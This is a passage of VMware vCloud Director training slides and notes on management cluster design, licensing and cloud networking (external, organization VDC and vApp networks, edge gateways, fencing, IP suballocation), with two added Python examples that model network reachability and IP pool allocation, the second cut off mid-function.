• The first instance is installed with the vCenter Chargeback server (option selected).
• Multiple data collectors can populate a single vCenter Chargeback database.
• The load is evenly distributed if multiple data collectors are enabled.

Diagram: vCenter Chargeback servers 1, 2, and 3 behind the built-in load balancer of the vCenter Chargeback Web interface.


Optional Advanced Message Queuing Protocol Broker
Slide 2-19

vCloud Director includes an AMQP service that you can configure to work with an AMQP broker such as RabbitMQ. If you want to use this service, you must install and configure an AMQP broker. Many integrations require AMQP to communicate with vCloud Director. Consult the installation and configuration documents for any integrations you plan to use. The notification stream carries events from every organization in the cloud, so the broker belongs with the management components: give each integration its own broker credentials and do not expose the broker on tenant networks.

Advanced Message Queuing Protocol (AMQP):
• An open standard for message queuing
• Supports flexible messaging for enterprise systems
• RabbitMQ is an AMQP broker.
• AMQP is used to provide cloud operators with a stream of notifications about events in the cloud.
• The use of an AMQP broker with vCloud Director is optional.


vCloud Components: vCloud Connector
Slide 2-20

vCloud Connector is an optional component that can facilitate transfer of a powered-off vApp in OVF format from a local cloud or vSphere environment to a remote cloud or vSphere environment.

As more clouds are created, several clouds from different sites in a private enterprise can form a larger cloud. Or a private cloud and a public cloud can form a hybrid cloud. Cloud consumers need a way to migrate workloads in a federated cloud.

vCloud Connector solves this problem by enabling you to perform migrations between all of your public clouds and private clouds and to obtain a consistent view of them from a single interface.

vCloud Connector must be installed by cloud administrators, but it can be used by other administrators and end users to view and manage workloads.

After vCloud Connector has been deployed to a vSphere host and registered with a vCenter Server system, end users can access vCloud Connector under Solutions and Applications in the vSphere Web Client from which the OVF file was deployed.

Even in environments not running vCloud Director, vCloud Connector can still be used to copy and move vApps. If both vCenter Server instances are added as clouds in vCloud Connector, you can freely move workloads between them.

vCloud Connector appliance:
• The vCloud Connector appliance is a Tomcat server and embedded Postgres database that bridges vCloud Director and vSphere environments.
• vCloud Connector uses temporary storage to facilitate file transfer.

vCloud Connector plug-in for vSphere Client:
• Unified view across vSphere and private and public clouds
• Visualize workloads and templates
• Migrate workloads and templates:
  - vSphere to and from vCloud Director
  - vSphere to and from vSphere
  - vCloud Director to and from vCloud Director
• Perform basic power and deployment operations on workloads and templates
• Access VMware Remote Console in vCloud Director

vCloud Connector Architecture
Slide 2-21

vCloud Connector is a virtual appliance. vCloud Connector installs in vSphere and handles all the business logic of dealing with other clouds. The vCloud Connector UI is displayed in the vSphere Web Client through a browser plug-in.

You have two considerations about where to place your vCloud Connector appliance:

• The virtual appliance must be deployed to a vCenter Server system. The only user access is through the vSphere Web Client, so users of vCloud Connector must have the right to log in to this vCenter Server system.

• Workload copy operations use the vCloud Connector appliance as a middleman, so network latency and bandwidth between clouds must be considered. In some cases, you might prefer to run multiple instances of vCloud Connector across multiple vCenter Server instances to avoid network latency or consuming excessive bandwidth. Because every transferred vApp is staged on the appliance's attached storage in transit, that staging area holds copies of tenant workloads and must be protected like any other datastore.

Diagram: the vCloud Connector virtual appliance, with attached staging storage at /opt/vmware/vccp/staging (initial configuration 40 GB), registered with a vCenter Server system that is accessed through the vSphere Client with the vCloud Connector plug-in. A vApp is moved from the local cloud or vSphere environment (private cloud) through the appliance to a vCloud Director instance in the remote cloud (public cloud).

Management and Cloud Resource Clusters
Slide 2-22

A management cluster is a VMware vSphere® High Availability or DRS cluster that is created to manage a vCloud architecture. A management cluster contains the standard components of ESXi hosts and a vCenter Server system. A management cluster has its own storage. The storage must be shared storage that is used to store the virtual machines running in the management cluster. The management cluster resides on a single physical site.

Although VMware recommends that you place management components in a management cluster, you can choose how many management components to place in that cluster. For example, the vCenter Server systems and vCloud Networking and Security instances might be hosted either in the management cluster or in their respective resource clusters.

vSphere High Availability and DRS can be enabled on the management cluster to provide availability for all management components. For vSphere High Availability, use the Percentage of Cluster Resources Reserved admission control policy in an n+1 fashion instead of defining the number of host failures a cluster can tolerate or specifying failover hosts. This approach allows management workloads to run evenly across the hosts in the cluster without the need to dedicate a host strictly for host failure situations. For higher availability, you can add a host for an n+2 cluster, although doing so is not a requirement of the vCloud private or public service definitions.

Management cluster, vCloud infrastructure virtual machines:
• vCenter Server virtual machines
• vCloud Director cell virtual machines
• vCenter Chargeback server virtual machines
• vCloud Networking and Security virtual appliance
• vCenter database virtual machines
• vCloud Director database virtual machine
• vCenter Chargeback database virtual machine

Optional management functions:
• Load balancer virtual machines for vCloud Director cells
• vCloud Connector virtual machines
• VMware vSphere® Update Manager virtual machines
• VMware vSphere® Management Assistant virtual machine
• VMware vSphere® Data Protection virtual machine

Cloud resources:
• vSphere resources are managed by vCloud Director.
• Each resource collection represents one or more provider VDCs.
• Cloud resources are exclusively for cloud user workloads: no management virtual machines (except vShield Edge virtual appliances deployed automatically).

Diagram: the management cluster beside the cloud resources, which are divided into several provider virtual data centers.

The resources of vCenter Server clusters host cloud workloads. These resources are allocated by vCloud Director as provider virtual data centers.

The management cluster and vCloud consumer resources must reside on the same physical site. The use of a single site ensures a consistent level of service. Otherwise, latency issues might arise if workloads must be moved from one site to another.

Do not use the vSphere Web Client to make changes to resource group objects. Changing the state of objects created by vCloud Director can cause unpredictable side effects because these objects are owned and managed by vCloud Director.

vCloud Architecture Best Practice
Slide 2-23

From an infrastructure perspective, a vCloud Director cloud is built on a foundation of virtual infrastructure. vCloud Director cloud components are split between a management cluster and cloud consumer resources.

When building a vCloud Director cloud, assume that all management components, such as vCenter Server and vCenter Chargeback, will run in virtual machines.

The best practice is to separate resources allocated for management functions from pure user-requested workloads. The underlying vSphere clusters should also be split into two logical groups:

• A single management cluster running all core components and services needed to run the cloud.

• The remaining available vCenter Server clusters should be aggregated into a pool called cloud consumer resources. These clusters are under the control of vCloud Director. Multiple clusters can be managed by the same vCenter Server system or different vCenter Server systems, but vCloud Director manages the clusters through the vCenter Server systems.

Why should the vSphere resources be organized and separated? Reasons include the following:

• To ensure that management components are separate from the resources that they are managing.

Underlying vSphere clusters should be split into two logical groups:
• A single management cluster running all core components and services needed to run the cloud.
• Remaining available vCenter Server clusters should be used as cloud resources. The VMware best practice is to use each cluster (resource pool) in a single provider virtual data center.
• Each vCloud Director cell should have a corresponding vCenter Server.

Reasons to organize and separate the vSphere resources:
• To ensure that management components are separate from the resources they are managing.
• To minimize overhead for cloud consumer resources. Resources allocated for cloud usage have little overhead reserved.
• Cloud resource groups should not host vCenter Server virtual machines that are not created and managed by vCloud Director.

• To minimize overhead for cloud consumer resources. Resources allocated for cloud use have little overhead reserved.

• To dedicate resources to the cloud. Resources can be consistently and transparently managed and divided. Resources can also be scaled horizontally.

• To more easily accommodate different service levels for distinct workload types.

The underlying vSphere infrastructure should follow vSphere best practices.

Licensing Considerations
Slide 2-24

Without distributed switches, vCloud Director cannot dynamically create networks or effectively use network pools.

vCloud Director requires the following vSphere licenses:
• VMware vSphere® Distributed Resource Scheduler, licensed by VMware vSphere® Enterprise Edition and VMware vSphere® Enterprise Plus Edition.
• VMware vSphere® Distributed Switch and dvFilter, licensed by vSphere Enterprise Plus Edition. This license enables creation and use of vCloud Director isolated networks and VLAN ID-backed network pools.
• vCloud Networking and Security can require a separate license (unless a VMware vCloud® Suite license is used).
• A vCloud Suite license can be used for vCloud Networking and Security and ESXi hosts.

Review of Learner Objectives
Slide 2-25

You should be able to meet the following objectives:
• Describe how VMware® products use the cloud computing approach
• Locate vCloud Director components and explain their functions
• Determine licensing needs

Key Points
Slide 2-26

• Large architectures should be divided into management clusters and resource groups.
• Load balancing is recommended for multicell architectures.
• Cells in a multicell architecture have various roles.
• Separate management from raw cloud resources.

Questions?

MODULE 3
VMware vCloud Director Networking

Slide 3-1
Module 3: VMware vCloud Director Networking

You Are Here
Slide 3-2

• Course Introduction
• VMware vCloud Director Architecture and Components
• VMware vCloud Director Networking (this module)
• VMware vCloud Director Providers
• VMware vCloud Director Organizations
• VMware vCloud Director Basic Security
• Managing VMware vCloud Director Resources
• Managing VMware vSphere Resources
• Monitoring VMware vCloud Director Components
• VMware vCloud Director Organization Users
• VMware vCloud Director Installation

Importance
Slide 3-3

Deployment and management of VMware® vCloud Director® requires a comprehensive understanding of vCloud Director networking configuration options. The subject of VMware vCloud® networking touches many key cloud computing concepts:

• Connection of VMware vSphere® vApps to outside users (external networks, organization virtual data center networks, and vApp networks)
• Multitenancy (separation of organization and vApp network traffic)
• Ability of customers to deploy networks dynamically (network pools)

In this module, you learn about the types of vCloud Director networks and services.

Lesson 1: Types of Networking Used in vCloud Director
Slide 3-5

Learner Objectives
Slide 3-6

By the end of this lesson, you should be able to meet the following objective:
• Describe the types of networking found in vCloud Director

vCloud Director Networks
Slide 3-7

Three types of networks are in VMware® vCloud Director®:

• External networks
• Organization virtual data center (VDC) networks
• VMware vSphere® vApp™ networks

The organization VDC networks and vApp networks operate at the customer level. The vApp networks must be connected to organization VDC networks if you need the following:

• vApps to communicate with other vApps in the organization
• A vApp to communicate with something outside of the cloud (such as the Internet)

Organization VDC networks tie vApps together, and they let vApps communicate outside the cloud by connecting to external networks.

vApp networks provide connectivity and services to the virtual machines contained in the vApp, and can connect those machines to a higher-level organization VDC network.

Both organization VDC networks and vApp networks can be isolated. Isolated networks can provide services to the connected virtual machines and internal networks, but do not connect to a higher-level network. An isolated network is therefore the strongest separation vCloud Director offers: traffic on it has no path to any higher-level network, so it cannot leave the organization or vApp.

vCloud Director creates three types of networks:
• External networks
• Organization virtual data center (VDC) networks
• vApp networks

Organization VDC networks and vApp networks can be configured in one of three configurations:
• Direct-connected to the higher network level
• Router-connected to the higher network level
• Isolated (no connections to higher networks)

vApps that direct-connect to an organization VDC network can be deployed by using network fencing.
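The hierarchy described above (external, organization VDC, vApp; each level direct-connected, routed, or isolated) is what decides whether two workloads can ever exchange traffic. The following added example, written for this page and not taken from the course or from VMware, encodes those rules as a small model: it rejects attachments the hierarchy does not allow (a vApp network on another organization's network, an organization VDC network attached to anything but an external network, fencing on a non-direct vApp network) and answers the question a reviewer asks first, whether two networks share any upward path. The topology it builds is constructed; the names and the `Topology` class are the example's own.

```python
"""Model of the vCloud Director network hierarchy and the reachability it implies.

Added example (not from the course or from VMware). Network types, the three
connection modes, and the rule that an organization's traffic can only leave
through an external network come from the text; the topology is constructed.
"""
from dataclasses import dataclass
from typing import Dict, Optional, Set

EXTERNAL, ORG_VDC, VAPP = "external", "org-vdc", "vapp"
DIRECT, ROUTED, ISOLATED = "direct", "routed", "isolated"


@dataclass
class Network:
    name: str
    kind: str                      # EXTERNAL, ORG_VDC or VAPP
    org: Optional[str] = None      # owning organization (None for external)
    mode: str = ISOLATED           # how it attaches to the next level up
    parent: Optional[str] = None   # name of the higher-level network, if any
    fenced: bool = False           # vApp networks only: fencing on a direct connection


class Topology:
    def __init__(self) -> None:
        self.nets: Dict[str, Network] = {}

    def add(self, net: Network) -> None:
        """Accept a network only if its attachment is allowed by the hierarchy."""
        if net.kind == EXTERNAL:
            if net.parent is not None or net.org is not None:
                raise ValueError(f"{net.name}: external networks have no parent or org")
        elif net.mode == ISOLATED:
            if net.parent is not None:
                raise ValueError(f"{net.name}: isolated networks have no parent")
        else:
            parent = self.nets.get(net.parent or "")
            if parent is None:
                raise ValueError(f"{net.name}: parent {net.parent!r} is not defined")
            expected = {ORG_VDC: EXTERNAL, VAPP: ORG_VDC}[net.kind]
            if parent.kind != expected:
                raise ValueError(f"{net.name}: a {net.kind} network must attach to a {expected} network")
            if net.kind == VAPP and parent.org != net.org:
                raise ValueError(f"{net.name}: cannot attach to another organization's network")
        if net.fenced and not (net.kind == VAPP and net.mode == DIRECT):
            raise ValueError(f"{net.name}: fencing applies only to direct-connected vApp networks")
        self.nets[net.name] = net

    def path_out(self, name: str) -> Set[str]:
        """Every network a packet could traverse walking upward from `name`."""
        seen: Set[str] = set()
        cur: Optional[str] = name
        while cur is not None and cur not in seen:
            seen.add(cur)
            cur = self.nets[cur].parent
        return seen

    def can_reach(self, a: str, b: str) -> bool:
        """True if the two networks share a network on their upward paths.

        Two organizations only ever meet on a shared external network. A routed
        hop still counts: the edge gateway can pass the traffic, and its
        firewall decides whether it actually does.
        """
        return bool(self.path_out(a) & self.path_out(b))


def build_sample() -> Topology:
    """Constructed two-organization topology used by the checks below."""
    t = Topology()
    t.add(Network("internet", EXTERNAL))
    t.add(Network("corp-backbone", EXTERNAL))
    t.add(Network("orgA-routed", ORG_VDC, org="A", mode=ROUTED, parent="internet"))
    t.add(Network("orgA-isolated", ORG_VDC, org="A"))
    t.add(Network("orgB-direct", ORG_VDC, org="B", mode=DIRECT, parent="internet"))
    t.add(Network("orgB-backbone", ORG_VDC, org="B", mode=ROUTED, parent="corp-backbone"))
    t.add(Network("A-web-vapp", VAPP, org="A", mode=ROUTED, parent="orgA-routed"))
    t.add(Network("A-lab-vapp", VAPP, org="A", mode=DIRECT, parent="orgA-isolated", fenced=True))
    t.add(Network("B-app-vapp", VAPP, org="B", mode=DIRECT, parent="orgB-backbone"))
    return t


if __name__ == "__main__":
    topo = build_sample()
    for a, b in [("A-web-vapp", "B-app-vapp"), ("A-web-vapp", "orgB-direct"), ("A-lab-vapp", "A-web-vapp")]:
        print(f"{a} -> {b}: {'possible' if topo.can_reach(a, b) else 'no path'}")
```

In the sample, organization A's web vApp and organization B's application vApp never meet because they sit behind different external networks, while A's web vApp and B's direct-connected network both reach the shared `internet` external network and are only kept apart by A's edge gateway firewall. The fenced lab vApp on the isolated organization VDC network reaches nothing outside that network.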

Customer Network Requirements and Network Stability
Slide 3-8

Cloud networking addresses a fundamental paradox. Corporate networks can be complex systems. These networks can be composed of hundreds or even thousands of physical network switches, routers, bridges, firewalls, and other devices. Each individual physical network device can have hundreds to thousands of programmable components. This large number of complex programmable components means that networks are extremely complex interconnected systems.

Teams of network engineers work hard to keep these complex interconnected systems stable and performing well. This means that network engineers are going to resist change. The best network engineers insist upon using structured change management systems to make sure that all changes are carefully planned, tested, and coordinated before being implemented.

Network engineers like stable networks that do not change much. Stable systems result in a higher quality of service for customers. Stable systems are also easier to manage and maintain.

In contrast, network customers like dynamic networks. They have constantly changing network needs and requirements. These needs usually require the rapid deployment of new network systems. The configuration requirements of these networks are diverse, depending on what the customer is using the network to support.

Corporate networks can be very complex systems.

Network engineers like stable networks that change very little:
• This provides a higher quality of service for customers.
• Networks are easier to manage and maintain.

Network customers like dynamic networks:
• "We need a new network for a special research group. We want them to have direct Internet access."
• "We need a new network for QA. It needs the same IP addresses as the production network."
• "We need a new network to test marketing. It needs Internet access, but it also needs to be protected."
• "We need a new network to control production equipment on the factory floor. This custom production line must be online immediately. We want the following IP addresses."

vCloud Director can provide dynamic networks to customers without damaging the stability of corporate IT network systems.

From the viewpoint of the customers, the best solution is for customers to have the power to instantly deploy their own networks. But customers do not have the knowledge or the expertise to deploy and manage these networks.

From the viewpoint of the network engineers, the best solution is to have networks that never change. But such networks do not meet the needs of the customers.

VMware vCloud® can provide dynamic network creation and deployment on a rapid basis to customers without damaging the stability of corporate IT network systems.

The final layer is where the vCloud customers (organizations) operate. Customers can use the organization VDC networks and network pools to create vApp networks and interconnect them. They create and interconnect vApp networks rapidly and easily, without disrupting the physical networks that all of these networking layers are built on. With vCloud Director version 5.1, organization administrators can create and manage routed and isolated organization VDC networks. With the advent of edge gateways, a system administrator can establish a wider boundary of delegation to organization administrators without sacrificing critical communication boundaries.

External Networks
Slide 3-10

External networks are logical, differentiated networks based on vSphere port groups. These port groups include distributed switch port groups, standard switch port groups, and Cisco Nexus 1000V port groups. Each port group can become a single external network. The best practice is to use port groups on distributed switches. A single distributed switch can have several port groups in it. Each port group can provide a connection point for a different external network. If you plan to create multiple external networks, the port groups should be separated by VLANs. The port groups must be created in vCenter Server and must already exist before vCloud Director can use them for external networks.

Even though this network is called an external network, a connection to the Internet is not required. An external network is external to vCloud organizations. You can create an external network that is used to connect multiple ESXi hosts to other internal corporate resources without a route to the Internet.

If you must provide vApps in the cloud with access to the Internet, create an external network that is connected through a gateway router to the Internet.

Port groups in a VMware vSphere® Distributed Resource Scheduler™ or VMware vSphere® High Availability cluster that is managed by vCloud Director do not have to be used for external networks. Many of those networks are for purposes outside of vCloud Director. One example of a network that is not used directly by vCloud Director would be a network that provides IP storage to ESXi hosts. Another example would be a management network used for the internal administration of ESXi hosts and vCenter Server systems. Such port groups should never be offered as external networks: an organization whose edge gateway is attached to the storage or management network has a path into infrastructure it is not supposed to see.

External networks:
• External networks are used to provide a connection outside the cloud, usually to the Internet.
• External networks are built on vSphere port groups.
• Organization VDC networks can connect to external networks directly or through an edge gateway router.
• External networks can be dedicated to a single organization or shared by multiple organizations.
• Several external networks can co-exist on the same physical LAN when separated by VLANs.

Diagram: one external network connected to the Internet, with the edge gateways of organization A and organization B both attached to it.


External networks can also be used to connect organizations together, either by use of a common network that both organization edge gateways connect to, or through an upstream router.

External Networks: Built on vSphere Port Groups (Slide 3-11)


Visualizing how external networks at the provider level are built on vSphere networks is important. In the diagram, a provider-level external network is built on a port group named External, which is located in the vDS-External distributed switch. The ESXi01 and ESXi02 hosts are connected to that distributed switch.

Both hosts use the physical NIC labeled vmnic1 as their uplink. In the diagram, vmnic1 on ESXi01 is labeled with the address 172.20.11.51 and vmnic1 on ESXi02 with 172.20.11.52. Both uplinks connect to a physical network known as the production network, which has been assigned the Classless Inter-Domain Routing (CIDR) block 172.20.11.0/24.

External networks connect to port groups that have been defined on vSphere virtual switches. If you plan to use a vSphere port group for a vCloud external network, increase the number of ports from the default value of 128 to 4096, because every virtual machine NIC and every Edge device NIC that vCloud Director attaches to the port group consumes one of its ports.

The best practice is to use only distributed switches. Distributed switches are automatically consistent in names and port groups on all ESXi hosts in a cluster, and vCloud Director can use them with dynamic provisioning.

[Figure, slide 3-11: external network backed by port group External on distributed switch vDS-External; ESXi01 (vmnic1, 172.20.11.51) and ESXi02 (vmnic1, 172.20.11.52) uplinked to the production network 172.20.11.0/24, which leads to the Internet]

vCloud Director supports the Cisco Nexus 1000V. However, the Nexus 1000V does not work with VLAN-backed network pools or with vCloud Director network isolation-backed (VCDNI) network pools. The Nexus 1000V requires network pools that are backed by port groups, and those port groups must be preprovisioned. The best practice is to use distributed switches with all network pools, including the port group-backed network pools used to support Cisco Nexus 1000V switches.


A standard switch can be used with vCloud Director external networks. Standard switches are supported, but not recommended. If you use standard switches, all the port groups have to be created identically, in advance, on every ESXi host. You can also use standard switches with network pools that are backed by port groups, but doing so is likewise not recommended.

Organization VDC Networks (Slide 3-12)


The types of organization VDC networks are:

• Direct-connect organization VDC networks: Created by the vCloud Director system administrator and cannot be changed or managed by the organization administrator. A direct-connect organization VDC network is a literal extension of a specific external network.

• Routed organization VDC networks: Connect to an edge gateway device (router). The vCloud Director system administrator must create each edge gateway, and only a vCloud Director system administrator can manage the external connections of the device. After an edge gateway has been created for an organization, the organization administrator can create as many routed networks as necessary, within the limits of the edge gateway that the vCloud Director administrator has defined. An edge gateway supports a maximum of 10 interfaces, and each routed network consumes one of them.

• Isolated organization VDC networks: Do not connect to an edge gateway and therefore cannot connect to an external network or to other organization VDC networks. An isolated network is served by an Edge device that provides DHCP and static IP services to a single internal network.

Organization users can attach routed vApp networks to each type of organization VDC network, or direct-connect vApps to each type of network.

• Direct-connect network: an extension of an external network; cannot be created or managed by the organization administrator.
• Routed networks: the organization administrator can create and manage multiple routed networks; each is managed separately, represents an edge gateway interface, and has its own DHCP ranges and static IP pools.
• Isolated networks: the organization administrator can create and manage multiple isolated networks; a VMware® vShield Edge™ device is deployed for each.

[Figure, slide 3-12: an external network feeding an edge gateway with routed organization VDC networks A, B and C, alongside an isolated organization VDC network served by its own vShield Edge]

Direct-Connect Organization VDC Network (Slide 3-13)


• This network can be created and managed only by a system administrator.
• DHCP and firewall services are not available; only a static IP pool is.
• Organization users can attach vApps and vApp networks.
• A vApp network attaches through a vShield Edge device, which consumes one IP address.
• Direct-connect vApps can attach many virtual machines, which can consume many IP addresses. Fencing is recommended to avoid MAC and IP conflicts and to add firewall protection.

[Figure, slide 3-13: an external network offering a static IP pool only, extended as a direct-connect organization VDC network]

Direct-connect organization VDC networks can be created and managed only by a vCloud Director system administrator. An organization administrator has no control over the network characteristics and network services of direct-connect organization VDC networks. Because a direct-connect organization VDC network is a literal extension of an external network, many services, such as DHCP and firewall, are not available.

Direct-connect organization VDC networks use an external network to connect directly to the Internet or to systems external to the cloud. For some single servers (such as small Web servers) that need no internal communication, this type of network is the best solution. For administrative purposes, a customer can connect through SSH or remote desktop directly to servers on this type of network.

If a vApp is direct-connected, either the vApp IP addresses must be statically configured or a DHCP server with a usable address range must be present on the external network. If vApp addresses are statically configured, they must use the same subnet as the external network. Direct-connected vApps should be fenced when connecting to external networks to prevent MAC or IP address conflicts.

When the vCloud administrator creates a direct-connect organization VDC network, no visible changes occur in the vSphere environment, because the external network has already been created by the vCloud administrator. Networks that are direct-connected have no VMware® vShield Edge™ devices deployed to provide network address translation (NAT) or firewall services.

Direct-connect organization VDC networks depend on systems that are external to vCloud, such as DHCP and DNS servers, for network support. vApp administrators can also manually configure the TCP/IP settings of virtual machines that are connected (through vApp networks) to direct-connected organization VDC networks. The vApp network might itself be direct-connected. The vApp administrator must configure the virtual machine network settings carefully to match the configuration in use on the external network.

Directly connecting systems to the Internet without firewall protection is not recommended. You can fence the vApp, which does provide firewall services.

vCloud administrators should also be aware that when multiple organization VDC networks are direct-connected to the same external network, they share one network segment, so traffic on any of these networks is visible from the others. That visibility can violate the cloud principle of multitenancy.

Direct-connect networks must be used with extreme caution.

NOTE
The vCloud Director GUI refers to external networks at both the provider and organization level. To prevent confusion, refer to an external network that is outside organizations as a provider external network. External networks that are inside organizations are either organization direct-connected networks or organization external networks.

Isolated Organization VDC Networks (Slide 3-14)


• An organization administrator can create and manage this type of network. Organization users can attach vApps and vApp networks.
• A vShield Edge device is deployed for DHCP and static IP pool services.
• Consumers: vApp networks, and the virtual machines of direct-connect vApps.
• An isolated network does not consume an edge gateway interface.

[Figure, slide 3-14: an isolated organization VDC network consisting of a vShield Edge device that provides DHCP and static IP pool services and has no connection to an external network]

An organization administrator can create any number of isolated organization VDC networks. An isolated organization VDC network is defined as a single subnet with an Edge device providing services. The isolated network Edge device cannot be connected to an external network or to any other organization VDC network.

If a customer does not want certain vApps to have a connection to the Internet, to external networks, or to other organization VDC networks, an isolated network is the best practice. Isolated internal vApp networks are appropriate when the virtual machines require only internal communication with each other; examples include networks for test systems and vApps that are used only for large computational jobs. Administration of virtual machines connected exclusively to internal networks is possible only through a local console connection. Virtual machines can still have multiple network interfaces, which enables a virtual machine to communicate privately over a local-only internal network while also accessing the Internet or another organization VDC network through a second interface.

An isolated network Edge device does not provide firewall or routing services. If virtual machines in different vApps must communicate with each other, you have the following options:

• Configure NAT on each vApp network Edge device to obfuscate the internal vApp networks
• Define static routes on the vApp network Edge devices
• Direct-connect the vApps to the isolated network


When direct-connecting vApps, consider fencing the vApps to avoid MAC and IP address conflicts.

Routed Organization VDC Networks (Slide 3-15)


Routed organization VDC networks connect to an edge gateway. An organization might be provided with one or more edge gateways. Each edge gateway supports up to 10 network interfaces, shared among the external and internal networks connected to the gateway. The organization administrator can create routed networks, configure NAT for each network (on the edge gateway device), manage IP allocation pools and DHCP ranges, and configure firewall rules.

Each routed organization VDC network represents a managed interface on an edge gateway. Services available to the routed networks attached to the same edge gateway are shared: if you enable or disable a service, such as the DHCP service, that change applies to all attached organization VDC networks. You can manage service state and configuration on a per-routed-network basis, but you are still managing the edge gateway itself.

Users can attach routed vApp networks or direct-connect vApps to a routed organization VDC network.

• Routed networks are attached to an edge gateway router.
• Can be created and managed by an organization administrator.
• Each routed network allocates a network interface on the organization edge gateway.
• DHCP and static IP pool ranges are managed individually on each organization VDC network.
• Services are shared: enabling or disabling a service affects all organization VDC networks on the edge gateway.
• Organization users can attach vApps and vApp networks to each organization VDC network.

[Figure, slide 3-15: an edge gateway with DHCP and static IP pools serving routed organization VDC networks A, B and C]

Organization Edge Gateways (Slide 3-16)

An edge gateway is a virtual router for organization VDC networks. You can configure an edge gateway to provide network services such as DHCP, firewall, NAT, static routing, virtual private network (VPN), and load balancing.

You can create an edge gateway in either a compact or a full configuration. The full configuration provides increased capacity and performance; the compact configuration requires less memory and fewer compute resources. All services are available in either configuration. You can enable either configuration for high availability: a high availability edge gateway provides automatic failover of the edge gateway to a backup instance that is running on a separate virtual machine.

An edge gateway can support up to 10 interfaces. These interfaces are categorized as uplinks when they connect to an external network and as internal interfaces when they connect to an organization VDC network. You must specify at least one uplink interface when you create an edge gateway. All uplink interfaces on an edge gateway must connect to an external network that is available in the provider VDC backing the organization VDC in which you are creating the edge gateway. Internal interfaces are created automatically when you create a routed organization VDC network that connects to an edge gateway.

Organizations can have one or more edge gateways:
• Each organization typically has at least one edge gateway that connects to a single external network and a single organization VDC network.
• Multiple edge gateways can be used to provide separate service and management points.
• A single edge gateway can connect to multiple external networks and be used to create many routed organization VDC networks.
• The maximum number of interfaces on the edge gateway router is 10.
• Edge gateways provide DHCP, static IP pool, firewall, NAT, rate limit, and load-balancing services.
• Edge gateways connect an organization to the Internet and can connect organizations. Organizations can be connected by use of a common external network and static routes.

vApp Networks (Slide 3-17)


A vApp network can be configured to provide many of the same kinds of services available to an organization VDC network.

These types of connections can be defined for a vApp network:

• Direct-connect network. The virtual machines in a direct-connect vApp are connected to a selected organization VDC network; the vApp network is an extension of that organization VDC network.

• Routed network. The routed connection is the most common vApp network configuration when the virtual machines of a vApp must have Internet access or access to other hosts attached to the network. A typical IP router with NAT features (a vShield Edge device) connects the single vApp network with an organization VDC network.

• Isolated network. An isolated vApp network does not connect to an organization VDC network. A vShield Edge device is deployed to provide its services.

[Figure, slide 3-17: three vApp networks attached to an organization VDC network, one directly connected, one through a vShield Edge router, and one isolated behind its own vShield Edge]

Direct-Connect vApps (Slide 3-18)

• A vShield Edge device is not deployed unless the vApp is fenced.
• Services are consumed from the organization VDC network edge gateway.
• Fencing is recommended.

[Figure, slide 3-18: direct-connect vApps on networks A, B and C behind an edge gateway (DHCP, static IP pool) that connects to an external network]

A vApp that you direct-connect does not have a network Edge device. The virtual machines are directly connected to, and consume the resources of, an organization VDC network. When creating a network that is direct-connected, you add one of the organization VDC networks as a vApp network.

Care must be taken when using direct-connect vApps. The virtual machines consume the organization VDC network resources (such as static IP pool addresses), and all network traffic for each virtual machine is sent over the organization VDC network.

When direct-connecting vApps, consider fencing the vApp to avoid potential MAC and IP address conflicts on the organization VDC network.


Multiconnection vApps (Slide 3-20)

 Always consider network security when designing vApp networking.


The vApp networking examples shown so far assume the same type of connection for each virtual machine in the vApp. A vApp can be configured to have many local networks and to connect to one or more organization VDC networks simultaneously, with the vApp author deciding how each virtual machine is connected.

The diagram shows how a single vApp can be configured with multiple networks. The vApp author can configure the virtual machines with multiple network interfaces, then connect each virtual machine network interface to any network added to the vApp.

[Figure, slide 3-20: one vApp attached to organization VDC networks A, B, C and D behind an edge gateway on an external network]

How many vApp networks does this vApp define? Answer: 4.
• A local network routed to network C
• A local network that is isolated
• A direct connection to network B
• A direct connection to network D

vApp Network Rules (Slide 3-21)

• vApps cannot connect to the same vApp network.
• Each vApp can have one or more vApp networks that connect to a common organization VDC network.
• A vShield Edge device or vShield Edge Gateway device is deployed for each vApp network. The exception is direct-connect, nonfenced vApps.
• Each vShield Edge can be configured for IP translation NAT or port forwarding NAT, but not both. You cannot use IP translation for one virtual machine and port forwarding for another virtual machine on the same vApp network.


Lab 1: Configuring VMware vCloud Director Networking (Slide 3-23)

Configure vCloud Director networking


Review of Learner Objectives (Slide 3-24)

 You should be able to meet the following objective:

Describe the types of networking found in vCloud Director


Lesson 2: Network Address Translation and Fencing (Slide 3-25)


Learner Objectives (Slide 3-26)

By the end of this lesson, you should be able to meet the following objectives:
• Describe NAT services provided by edge gateways and other network devices used in vCloud Director
• Describe the difference between a fenced vApp and a routed vApp

Suballocated IP Pools (Slide 3-27)

[Figure, slide 3-27: external network 172.20.10.0/24 with static IP pool 172.20.10.100-199; the Organization A edge gateway is suballocated 172.20.10.110-119 and the Organization B edge gateway 172.20.10.120-129]

For each external network, the vCloud Director system administrator can configure one or more static IP pool ranges. The static IP pools are used by the edge gateways and virtual machines that connect to that network.

The system administrator can suballocate a portion of the static IP pool on an external network to a specific edge gateway for use in NAT operations. Suballocated ranges must be available before destination NAT and source NAT rules can be configured on an edge gateway. Each suballocated pool is reserved for that gateway and is not used for normal IP allocations on the external network.

• Suballocated IP pools are created and managed by a system administrator on specific edge gateway devices.
• An organization administrator uses the suballocation range for destination network address translation (DNAT) and source network address translation (SNAT) mappings.
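The suballocation rules above lend themselves to a small check. The following is an added example written for this page, not code from the course or from vCloud Director: it models an external network's static pool with per-gateway suballocations in plain Python (the network name, the ranges and the gateway names are constructed to match the slide) and enforces that a suballocation lies within the pool, does not overlap another gateway's range and is skipped by normal allocations, and that a gateway's NAT rules may only use addresses from its own range.

```python
# Added example, not part of the vCloud Director course material or of
# vCloud Director itself: a small model of an external network's static IP
# pool and the per-edge-gateway suballocations the slide describes, with the
# checks a system administrator wants before handing a range to a tenant.
# Network name, ranges and gateway names are constructed for the example.
import ipaddress
from dataclasses import dataclass, field


def _parse_range(first: str, last: str):
    a, b = ipaddress.ip_address(first), ipaddress.ip_address(last)
    if a > b:
        raise ValueError(f"range {first}-{last} is reversed")
    return a, b


@dataclass
class ExternalNetwork:
    name: str
    cidr: str
    static_pool: tuple                                   # (first, last) of the pool
    suballocations: dict = field(default_factory=dict)   # gateway name -> (first, last)
    allocated: set = field(default_factory=set)          # addresses handed out normally

    def suballocate(self, gateway: str, first: str, last: str) -> None:
        """Reserve a slice of the static pool for one edge gateway's NAT rules."""
        net = ipaddress.ip_network(self.cidr)
        a, b = _parse_range(first, last)
        pool_first, pool_last = _parse_range(*self.static_pool)
        if a not in net or b not in net:
            raise ValueError(f"{first}-{last} is not inside {self.cidr}")
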